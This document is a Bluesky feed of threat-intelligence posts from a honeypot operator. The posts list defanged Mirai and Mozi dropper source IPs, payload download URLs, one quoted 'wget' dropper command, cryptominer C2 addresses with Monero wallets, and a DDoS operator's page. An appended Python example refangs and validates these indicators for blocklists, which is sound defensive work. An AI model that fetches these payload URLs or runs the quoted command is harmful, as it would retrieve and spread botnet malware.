Shoggoth-Industries
@shoggot-indus.bsky.social
New Blog Post: Hunt the Hunter.

A short article about C2 hunters on the net.

blog.shoggoth.industries/articles/hun...

#binaryedge
#malwarehunter
#C2
Hunt the Hunter
Introduction: After about two months of telemetry, we observed certain recurring behavior on our honeypots.
blog.shoggoth.industries
March 1, 2025 at 8:15 PM
[2025-02-06]
Lots of droppers today

blog.shoggoth.industries/daily-posts/...
February 5, 2025 at 11:34 PM
[2025-01-28]

[Stage 1 Dropper]:
8: 87.121.84.7
9: 115.49.126.169

[Stage 2 Dropper]:
8: URL is not an IP or domain, see report.
9: URL is not an IP or domain, see report.

Shoggoth's report for today.
January 30, 2025 at 10:24 PM
[2025-01-28]

[Stage 1 Dropper]:
6: 42.224.192.154
7: 59.184.246.90

[Stage 2 Dropper]:
6: URL is not an IP or domain, see report.
7: URL is not an IP or domain, see report.

Shoggoth's report for today.
January 30, 2025 at 10:24 PM
[2025-01-28]

[Stage 1 Dropper]:
4: 45.148.10.242
5: 194.42.107.85

[Stage 2 Dropper]:
4: URL is not an IP or domain, see report.
5: URL is not an IP or domain, see report.

Shoggoth's report for today.
January 30, 2025 at 10:24 PM
[2025-01-28]

[Stage 1 Dropper]:
2: 141.255.166.90
3: 45.148.10.242

[Stage 2 Dropper]:
2: URL is not an IP or domain, see report.
3: URL is not an IP or domain, see report.

Shoggoth's report for today.
January 30, 2025 at 10:24 PM
[2025-01-28]

[Stage 1 Dropper]:
1: 117.215.59.182

[Stage 2 Dropper]:
1: URL is not an IP or domain, see report.

Shoggoth's report for today.
January 30, 2025 at 10:24 PM
[2025-01-28]

[Stage 1 Dropper]:
1: 141.255.166.90
2: 81.17.101.155

[Stage 2 Dropper]:
1: URL is not an IP or domain, see report.
2: URL is not an IP or domain, see report.

Shoggoth's report for today.
January 29, 2025 at 9:10 PM
[2025-01-28]

[Stage 1 Dropper]:
2: 175.107.2.120
3: 112.113.206.189

[Stage 2 Dropper]:
2: URL is not an IP or domain, see report.
3: URL is not an IP or domain, see report.

Shoggoth's report for today.
January 28, 2025 at 11:30 PM
[2025-01-28]

[Stage 1 Dropper]:
1: 81.17.101.155

[Stage 2 Dropper]:
1: URL is not an IP or domain, see report.

Shoggoth's report for today.
January 28, 2025 at 11:30 PM
[25-01-2025]
[Stage 1 Dropper]:
46.19.143[.]26
45.230.66[.]59
190.77.194[.]80

[Stage 2 Dropper] :
http://185.225.17[.]58/create.py
http://45.230.66[.]59:11404/Mozi.m
http://154.213.189[.]145/sh

See more at:
blog.shoggoth.industries/daily-posts/...

#mirai
Report: 2025-01-25
Daily Report: 2025-01-25: Interaction report on the HTTP service of various honeypots around the world.
blog.shoggoth.industries
January 25, 2025 at 11:02 PM
[23-01-2025]
[Stage 1 Dropper]:

185.196.10[.]129
117.213.82[.]239
45.164.177[.]181

[Stage 2 Dropper] :

http://193.143.1[.]66/bins
http://117.213.82[.]239:56175/Mozi.m
http://45.164.177[.]181:10220/Mozi.m

#mirai
#dropper
#CTI
January 24, 2025 at 8:33 AM
[Potential Cryptominer C&C server]
REQ SRC IP: 185.213.175[.]171

It's seen to use the XMRig software.

Requested Monero wallet:
49PybvnVss4jhuo7AxfL2TU1CbMXt2qJVhnVPqoys2qxcr2iMwJrCKoSfgAuoxYo6jToQfHpbeREMWKBLApcuCESSDgecfZ

#monero
#cryptominer
#XMRig
January 19, 2025 at 8:29 PM
[19-01-2025]
[Stage 1 Dropper]:

146.190.96[.]244
115.50.148[.]57

[Stage 2 Dropper] :

159.223.45[.]59/jaws
http://115.50.148[.]57:52550/Mozi.a
January 19, 2025 at 8:19 PM
[Stage 1 Dropper]: 18-01-2025

120.85.113[.]237
183.131.19[.]86

[Stage 2 Dropper] :

http://103.163.215[.]73/moo
http://129.159.107[.]197/jaws

#mirai
January 18, 2025 at 10:18 PM
[Threat Actor Note]

Mirai dropper IP.
http://103.163.215[.]73/

#CyberCrime
#mirai
#botnet
January 18, 2025 at 10:18 PM
[Stage 1 Dropper]: 17-01-2025

31.220.1[.]144
117.215.49[.]242
27.193.186[.]202
45.230.66[.]53

[Stage 2 Dropper]
http://45.230.66[.]53:11213/Mozi.a
http://103.163.215[.]73/moo
January 18, 2025 at 10:17 PM
[Potential MIRAI dropper]

See picture 1 for full request.
SRC REQ IP:
141.98.11[.]119

See picture 2.
Website used as dropper.
http://theeyefirewall[.]su

#mirai
January 18, 2025 at 10:16 PM
[Interesting]

Malware Hunter census (Shodan) IP: 66.240.205[.]34

An IP that sends other hosts dummy C2 zombie responses, hoping that a C2 will respond.

#shodan
#C2
#detection
January 18, 2025 at 10:15 PM
[Stage 1 Dropper]: 13-01-2025

31.220.1[.]144
117.199.152[.]94
103.158.96[.]157
January 18, 2025 at 10:15 PM
[Mirai dropper]

SRC request IP: 185.187.235[.]243

Requested dropper url : wget http://103.163.215[.]73/hello

Dropper targeting multiple architectures.

VirusTotal URL for the MIPS architecture implant.
virustotal.com/gui/file/af4...

#mirai
January 18, 2025 at 10:14 PM
[Stage 1 Dropper]: 12-01-2025

Request src IP:
31.220.1[.]88
197.58.106[.]114
117.72.37[.]8
103.42.243[.]3
154.213.187[.]182
141.98.11[.]155
183.131.19[.]86
31.220.1[.]144
112.54.138[.]154

#mirai
#botnet
January 18, 2025 at 10:12 PM
[Potential Cryptominer C&C server]

REQ SRC IP: 185.213.175[.]171

It's seen to use the XMRig software.

Requested Monero wallet: 49813t4akUsWfmnfBnwsMEeWd4APL94Ji7CL9qgnVCTJeHeZEARaurtDnQ2dzhDzSMjZSJxonjPeQXrkAX37gWj32jWsd4j

#cryptominer
#monero
#XMRig
January 18, 2025 at 10:11 PM
[Bio website of DDoS operator]

http://185.187.235[.]243/

MD5 hash of the favicon:
shodan.io/search?query...

Bio website template.
github.com/Yoghurt1337/Bi
January 18, 2025 at 10:10 PM
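The posts above publish indicators in a fixed layout: a "[Stage 1 Dropper]" block of attacking source IPs, then a "[Stage 2 Dropper]" block of payload URLs, both defanged with "[.]" and sometimes prefixed with a counter ("1: ..."), with a placeholder line where the URL was neither an IP nor a domain. Anyone consuming the feed as CTI has to refang, validate and de-duplicate before anything lands in a blocklist. The following is an added example written for this page, not code from Shoggoth-Industries or from the blog; the sample post is constructed in the feed's own layout (addresses copied from the posts above plus one private address to show the filter), the "N: " prefix stripping, the RFC 1918/non-global rejection and the treatment of the "see report" placeholder as a skipped line are the parser's assumptions, and the `self_hosting` check is an added observation about the data (the same address appearing as Stage 1 source and Stage 2 host, as with the Mozi.m URLs above), not a claim made by the author.

```python
"""Parse defanged Stage 1 / Stage 2 dropper indicators from CTI posts.

Added example, not the feed author's code: reads the post layout used in the
feed above, refangs "[.]" (and "hxxp"), validates every address and returns
clean, de-duplicated indicators plus the lines it refused to trust.
"""
import ipaddress
import re
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urlsplit

# Constructed sample in the feed's layout. The private 192.168.1[.]10 and the
# "see report" placeholder are there to exercise the filtering paths.
SAMPLE_POST = """\
[Stage 1 Dropper]:
1: 141.255.166[.]90
2: 81.17.101[.]155
45.230.66[.]59
192.168.1[.]10

[Stage 2 Dropper] :
1: http://185.225.17[.]58/create.py
2: URL not a IP or domain , see report.
http://45.230.66[.]59:11404/Mozi.m
159.223.45[.]59/jaws
http://theeyefirewall[.]su
"""

SECTION_RE = re.compile(r"^\[Stage\s*(\d)\s*Dropper\]", re.IGNORECASE)
COUNTER_RE = re.compile(r"^\d+:\s*")                       # optional "N: " prefix
HOST_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z0-9-]+$")     # dotted IP or domain only


@dataclass
class Stage2:
    url: str
    host: str
    port: Optional[int]
    path: str


@dataclass
class DropperReport:
    stage1: list[str] = field(default_factory=list)
    stage2: list[Stage2] = field(default_factory=list)
    skipped: list[str] = field(default_factory=list)     # lines that failed validation


def refang(text: str) -> str:
    """Undo the common defanging conventions: "[.]" -> ".", "hxxp" -> "http"."""
    return re.sub(r"hxxp", "http", text.replace("[.]", "."), flags=re.IGNORECASE)


def routable_ipv4(candidate: str) -> Optional[str]:
    """Return the address if it is valid, globally routable IPv4; else None.
    Private/reserved space (typos, lab leftovers) must never reach a blocklist."""
    try:
        addr = ipaddress.IPv4Address(candidate)
    except ipaddress.AddressValueError:
        return None
    return str(addr) if addr.is_global else None


def parse_stage2(item: str) -> Optional[Stage2]:
    """Normalise a refanged payload URL; bare "host/path" items are assumed http."""
    url = item if "://" in item else "http://" + item
    parts = urlsplit(url)
    host = parts.hostname
    if not host or not HOST_RE.match(host):        # rejects the "see report" placeholder
        return None
    try:
        port = parts.port                          # ValueError on a malformed port
    except ValueError:
        return None
    if re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host) and routable_ipv4(host) is None:
        return None                                # dotted IP that is not routable
    return Stage2(url=url, host=host, port=port, path=parts.path or "/")


def parse_post(text: str) -> DropperReport:
    """Walk the post line by line, tracking which [Stage N Dropper] block is open."""
    report, stage, seen = DropperReport(), None, set()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        header = SECTION_RE.match(line)
        if header:
            stage = int(header.group(1))
            continue
        if stage is None:                          # prose before the first block
            continue
        item = refang(COUNTER_RE.sub("", line))
        if stage == 1:
            ip = routable_ipv4(item)
            if ip is None:
                report.skipped.append(line)
            elif ip not in seen:
                seen.add(ip)
                report.stage1.append(ip)
        else:
            entry = parse_stage2(item)
            if entry is None:
                report.skipped.append(line)
            elif entry.url not in seen:
                seen.add(entry.url)
                report.stage2.append(entry)
    return report


def self_hosting(report: DropperReport) -> list[str]:
    """Stage 1 sources that also serve a Stage 2 payload, i.e. the attacking bot
    hosts the binary itself, as with the Mozi.m URLs in the feed above."""
    hosts = {entry.host for entry in report.stage2}
    return [ip for ip in report.stage1 if ip in hosts]


if __name__ == "__main__":
    r = parse_post(SAMPLE_POST)
    print("stage1:", r.stage1)
    print("stage2:", [(e.host, e.port, e.path) for e in r.stage2])
    print("skipped:", r.skipped)
    print("self-hosting:", self_hosting(r))
```

Every refused line is kept in `skipped` rather than silently dropped, so a reviewer can see what the parser would not trust; in a pipeline that is the queue to eyeball before the accepted indicators are pushed to a blocklist or a hunting query.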